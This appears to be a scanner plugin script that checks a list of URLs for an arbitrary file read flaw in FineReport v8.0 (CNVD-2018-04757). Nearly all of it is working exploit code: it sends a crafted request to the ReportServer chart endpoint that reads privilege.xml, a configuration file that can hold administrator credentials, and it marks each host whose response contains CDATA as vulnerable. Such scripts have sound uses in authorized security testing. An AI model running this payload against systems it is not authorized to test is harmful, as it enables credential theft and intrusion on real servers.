#request urls = array
#define payload = /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
#define bug = CDATA
#define info = 帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

function main(args){
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
	
}
